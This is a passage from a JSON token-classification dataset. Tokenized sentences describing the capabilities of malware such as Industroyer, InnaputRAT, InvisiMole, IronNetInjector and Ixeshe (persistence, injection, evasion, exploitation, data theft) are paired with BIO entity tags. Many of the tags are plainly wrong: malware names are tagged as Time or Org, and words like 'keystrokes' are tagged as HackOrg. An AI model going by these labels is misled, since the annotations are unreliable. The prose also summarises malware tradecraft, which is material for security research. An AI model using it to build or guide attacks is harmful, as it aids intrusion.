"<code>SYSTEM\\CurrentControlSet\\Services</code>", "to", "render", "a", "system", "inoperable." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "collects", "the", "victim", "machine’s", "Windows", "GUID." ], "ner_tags": [ "B-Idus", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer’s", "61850", "payload", "component", "enumerates", "connected", "network", "adapters", "and", "their", "corresponding", "IP", "addresses." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer", "can", "use", "supplied", "user", "credentials", "to", "execute", "processes", "and", "stop", "services." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Industroyer’s", "main", "backdoor", "connected", "to", "a", "remote", "C2", "server", "using", "HTTPS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "Industroyer", "can", "use", "an", "arbitrary", "system", "service", "to", "load", "at", "system", "boot", "for", "persistence", "and", "replaces", "the", "ImagePath", "registry", "value", "of", "a", "Windows", "service", "with", "a", "new", "backdoor", "binary." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Industroyer2", "has", "the", "ability", "to", "cyclically", "enumerate", "running", "processes", "such", "as", "PServiceControl.exe,", "PService_PDD.exe,", "and", "other", "targets", "supplied", "through", "a", "hardcoded", "configuration." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InnaputRAT", "has", "a", "command", "to", "delete", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "InnaputRAT", "enumerates", "directories", "and", "obtains", "file", "attributes", "on", "a", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "InnaputRAT", "variants", "have", "attempted", "to", "appear", "legitimate", "by", "adding", "a", "new", "service", "named", "OfficeUpdateService." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "InnaputRAT", "variants", "have", "attempted", "to", "appear", "legitimate", "by", "using", "the", "file", "names", "SafeApp.exe", "and", "NeutralApp.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "InnaputRAT", "uses", "the", "API", "call", "ShellExecuteW", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "InnaputRAT", "uses", "an", "8-byte", "XOR", "key", "to", "obfuscate", "API", "names", "and", "other", "strings", "contained", "in", "the", "payload." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "InnaputRAT", "variants", "establish", "persistence", "by", "modifying", "the", "Registry", "key", "<code>HKU\\<SID>\\Software\\Microsoft\\Windows\\CurrentVersion\\Run:%appdata%\\NeutralApp\\NeutralApp.exe</code>." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "InnaputRAT", "gathers", "volume", "drive", "information", "and", "system", "information." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "InnaputRAT", "launches", "a", "shell", "to", "execute", "commands", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Some", "InnaputRAT", "variants", "create", "a", "new", "Windows", "service", "to", "establish", "persistence." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "enumerate", "windows", "and", "child", "windows", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "uses", "a", "variation", "of", "the", "XOR", "cipher", "to", "encrypt", "files", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "use", "zlib", "to", "compress", "and", "decompress", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "uses", "WinRAR", "to", "compress", "data", "that", "is", "intended", "to", "be", "exfiltrated." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "inject", "its", "code", "into", "a", "trusted", "process", "via", "the", "APC", "queue." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "InvisiMole", "can", "record", "sound", "using", "input", "audio", "devices." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "sort", "and", "collect", "specific", "documents", "as", "well", "as", "generate", "a", "list", "of", "all", "files", "on", "a", "newly", "inserted", "drive", "and", "store", "them", "in", "an", "encrypted", "file." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "use", "fileless", "UAC", "bypass", "and", "create", "an", "elevated", "COM", "object", "to", "escalate", "privileges." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "use", "the", "<code>ITaskService</code>,", "<code>ITaskDefinition</code>", "and", "<code>ITaskSettings</code>", "COM", "interfaces", "to", "schedule", "a", "task." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "register", "itself", "for", "execution", "and", "persistence", "via", "the", "Control", "Panel." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "be", "launched", "by", "using", "DLL", "search", "order", "hijacking", "in", "which", "the", "wrapper", "DLL", "is", "placed", "in", "the", "same", "folder", "as", "explorer.exe", "and", "loaded", "during", "startup", "into", "the", "Windows", "Explorer", "process", "instead", "of", "the", "legitimate", "library." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "used", "a", "custom", "implementation", "of", "DNS", "tunneling", "to", "embed", "C2", "communications", "in", "DNS", "requests", "and", "replies." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "collect", "data", "from", "the", "system,", "and", "can", "monitor", "changes", "in", "specified", "directories." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "collect", "jpeg", "files", "from", "connected", "MTP", "devices." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "decrypt,", "unpack", "and", "load", "a", "DLL", "from", "its", "resources,", "or", "from", "blobs", "encrypted", "with", "Data", "Protection", "API,", "two-key", "triple", "DES,", "and", "variations", "of", "the", "XOR", "cipher." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "a", "command", "to", "disable", "routing", "and", "the", "Firewall", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "use", "Data", "Protection", "API", "to", "encrypt", "its", "components", "on", "the", "victim’s", "computer,", "to", "evade", "detection,", "and", "to", "make", "sure", "the", "payload", "can", "only", "be", "decrypted", "and", "loaded", "on", "one", "specific", "compromised", "computer." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "installed", "legitimate", "but", "vulnerable", "Total", "Video", "Player", "software", "and", "wdigest.dll", "library", "drivers", "on", "compromised", "hosts", "to", "exploit", "stack", "overflow", "and", "input", "validation", "vulnerabilities", "for", "code", "execution." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "exploited", "CVE-2007-5633", "vulnerability", "in", "the", "speedfan.sys", "driver", "to", "obtain", "kernel", "mode", "privileges." ], "ner_tags": [ "B-Org", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "spread", "within", "a", "network", "via", "the", "BlueKeep", "(CVE-2019-0708)", "and", "EternalBlue", "(CVE-2017-0144)", "vulnerabilities", "in", "RDP", "and", "SMB", "respectively." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "O", "B-Way", "B-Features", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "InvisiMole", "InvisiMole", "can", "identify", "proxy", "servers", "used", "by", "the", "victim", "and", "use", "them", "for", "C2", "communication." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "been", "configured", "with", "several", "servers", "available", "for", "alternate", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "deleted", "files", "and", "directories", "including", "XML", "and", "files", "successfully", "uploaded", "to", "C2", "servers." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "list", "information", "about", "files", "in", "a", "directory", "and", "recently", "opened", "or", "used", "documents.", "InvisiMole", "can", "also", "search", "for", "specific", "files", "by", "supplied", "file", "mask." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "create", "hidden", "system", "directories." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "InvisiMole", "has", "executed", "legitimate", "tools", "in", "hidden", "windows." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "undergone", "regular", "technical", "improvements", "in", "an", "attempt", "to", "evade", "detection." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "upload", "files", "to", "the", "victim's", "machine", "for", "operations." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "can", "remove", "all", "system", "restore", "points." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "B-HackOrg" ] }, { "tokens": [ "InvisiMole", "can", "function", "as", "a", "proxy", "to", "create", "a", "server", "that", "relays", "communication", "between", "the", "client", "and", "C&C", "server,", "or", "between", "two", "clients." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "use", "a", "JavaScript", "file", "as", "part", "of", "its", "execution", "chain." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "capture", "keystrokes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "used", "ListPlanting", "to", "inject", "code", "into", "a", "trusted", "process." ], "ner_tags": [ "B-Time", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "a", "command", "to", "list", "account", "information", "on", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "determines", "a", "working", "directory", "where", "it", "stores", "all", "the", "gathered", "data", "about", "the", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "deliver", "trojanized", "versions", "of", "software", "and", "documents,", "relying", "on", "user", "execution." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "attempted", "to", "disguise", "itself", "by", "registering", "under", "a", "seemingly", "legitimate", "service", "name." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "disguised", "its", "droppers", "as", "legitimate", "software", "or", "documents,", "matching", "their", "original", "names", "and", "locations,", "and", "saved", "its", "files", "as", "mpr.dll", "in", "the", "Windows", "folder." ], "ner_tags": [ "B-Time", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "a", "command", "to", "create,", "set,", "copy,", "or", "delete", "a", "specified", "Registry", "key", "or", "value." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "use", "winapiexec", "tool", "for", "indirect", "execution", "of", "<code>ShellExecuteW</code>", "and", "<code>CreateProcessA</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "InvisiMole", "can", "scan", "the", "network", "for", "open", "ports", "and", "vulnerable", "instances", "of", "RDP", "and", "SMB", "protocols." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "InvisiMole", "can", "disconnect", "previously", "connected", "remote", "drives." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "gather", "network", "share", "information." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "InvisiMole", "has", "used", "TCP", "to", "download", "additional", "modules." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "use", "a", "modified", "base32", "encoding", "to", "encode", "data", "within", "the", "subdomain", "of", "C2", "requests." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "avoids", "analysis", "by", "encrypting", "all", "strings,", "internal", "files,", "configuration", "data", "and", "by", "using", "a", "custom", "executable", "format." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "I-Tool", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "inject", "its", "backdoor", "as", "a", "portable", "executable", "into", "a", "target", "process." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "B-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "obtain", "a", "list", "of", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "inject", "itself", "into", "another", "process", "to", "avoid", "detection", "including", "use", "of", "a", "technique", "called", "ListPlanting", "that", "customizes", "the", "sorting", "algorithm", "in", "a", "ListView", "structure." ], "ner_tags": [ "B-SamFile", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "mimic", "HTTP", "protocol", "with", "custom", "HTTP", "“verbs”", "HIDE,", "ZVVP,", "and", "NOP." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "InvisiMole", "can", "enumerate", "Registry", "values,", "keys,", "and", "data." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "B-HackOrg", "B-Features", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "place", "a", "lnk", "file", "in", "the", "Startup", "Folder", "to", "achieve", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "used", "rundll32.exe", "for", "execution." ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "InvisiMole", "has", "used", "scheduled", "tasks", "named", "<code>MSST</code>", "and", "<code>\\Microsoft\\Windows\\Autochk\\Scheduled</code>", "to", "establish", "persistence." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "capture", "screenshots", "of", "not", "only", "the", "entire", "screen,", "but", "of", "each", "separate", "window", "open,", "in", "case", "they", "are", "overlapping." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "check", "for", "the", "presence", "of", "network", "sniffers,", "AV,", "and", "BitDefender", "firewall." ], "ner_tags": [ "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "InvisiMole", "has", "used", "Windows", "services", "as", "a", "way", "to", "execute", "its", "malicious", "payload." ], "ner_tags": [ "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "use", "a", ".lnk", "shortcut", "for", "the", "Control", "Panel", "to", "establish", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "collect", "information", "about", "installed", "software", "used", "by", "specific", "users,", "software", "executed", "on", "user", "login,", "and", "software", "executed", "by", "each", "system." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "uses", "variations", "of", "a", "simple", "XOR", "encryption", "routine", "for", "C&C", "communications." ], "ner_tags": [ "B-Org", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "check", "for", "artifacts", "of", "VirtualBox,", "Virtual", "PC", "and", "VMware", "environment,", "and", "terminate", "itself", "if", "they", "are", "detected." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "gather", "information", "on", "the", "mapped", "drives,", "OS", "version,", "computer", "name,", "DEP", "policy,", "memory", "size,", "and", "system", "volume", "serial", "number." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "gathers", "information", "on", "the", "IP", "forwarding", "table,", "MAC", "address,", "configured", "proxy,", "and", "network", "SSID." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "lists", "local", "users", "and", "session", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "obtain", "running", "services", "on", "the", "victim." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "gathers", "the", "local", "system", "time", "from", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "replace", "legitimate", "software", "or", "documents", "in", "the", "compromised", "network", "with", "their", "trojanized", "versions,", "in", "an", "attempt", "to", "propagate", "itself", "within", "the", "network." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "samples", "were", "timestomped", "by", "the", "authors", "by", "setting", "the", "PE", "timestamps", "to", "all", "zero", "values.", "InvisiMole", "also", "has", "a", "built-in", "command", "to", "modify", "file", "times." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "B-HackOrg", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "InvisiMole", "can", "remotely", "activate", "the", "victim’s", "webcam", "to", "capture", "content." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "launch", "a", "remote", "shell", "to", "execute", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "InvisiMole", "can", "register", "a", "Windows", "service", "named", "CsPower", "as", "part", "of", "its", "execution", "chain,", "and", "a", "Windows", "service", "named", "clr_optimization_v2.0.51527_X86", "to", "achieve", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "Invoke-PSImage", "can", "be", "used", "to", "embed", "payload", "data", "within", "a", "new", "image", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Invoke-PSImage", "can", "be", "used", "to", "embed", "a", "PowerShell", "script", "within", "the", "pixels", "of", "a", "PNG", "file." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IronNetInjector", "has", "the", "ability", "to", "decrypt", "embedded", ".NET", "and", "PE", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "IronNetInjector", "has", "the", "ability", "to", "inject", "a", "DLL", "into", "running", "processes,", "including", "the", "IronNetInjector", "DLL", "into", "explorer.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "B-SamFile" ] }, { "tokens": [ "IronNetInjector", "can", "obfuscate", "variable", "names,", "encrypt", "strings,", "as", "well", "as", "base64", "encode", "and", "Rijndael", "encrypt", "payloads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "IronNetInjector", "has", "been", "disguised", "as", "a", "legitimate", "service", "using", "the", "name", "PythonUpdateSrvc." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "IronNetInjector", "can", "identify", "processes", "via", "C#", "methods", "such", "as", "<code>GetProcessesByName</code>", "and", "running", "Tasklist", "with", "the", "Python", "<code>os.popen</code>", "function." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "IronNetInjector", "can", "use", "an", "IronPython", "scripts", "to", "load", "a", ".NET", "injector", "to", "inject", "a", "payload", "into", "its", "own", "or", "a", "remote", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "IronNetInjector", "can", "use", "IronPython", "scripts", "to", "load", "payloads", "with", "the", "help", "of", "a", ".NET", "injector." ], "ner_tags": [ "B-SamFile", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam" ] }, { "tokens": [ "IronNetInjector", "has", "used", "a", "task", "XML", "file", "named", "<code>mssch.xml</code>", "to", "run", "an", "IronPython", "script", "when", "a", "user", "logs", "in", "or", "when", "specific", "system", "events", "are", "created." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "can", "collect", "data", "from", "a", "local", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "has", "a", "command", "to", "delete", "a", "file", "from", "the", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "can", "list", "file", "and", "directory", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "sets", "its", "own", "executable", "file's", "attributes", "to", "hidden." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "can", "download", "and", "execute", "additional", "files." ], "ner_tags": [ "B-Idus", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "Ixeshe", "has", "used", "registry", "values", "and", "file", "names", "associated", "with", "Adobe", "software,", "such", "as", "AcroRd32.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "Ixeshe", "can", "list", "running", "processes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "can", "achieve", "persistence", "by", "adding", "itself", "to", "the", "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", "Registry", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "uses", "custom", "Base64", "encoding", "schemes", "to", "obfuscate", "command", "and", "control", "traffic", "in", "the", "message", "body", "of", "HTTP", "requests." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Ixeshe", "collects", "the", "computer", "name", "of", "the", "victim's", "system", "during", "the", "initial", "infection." ], 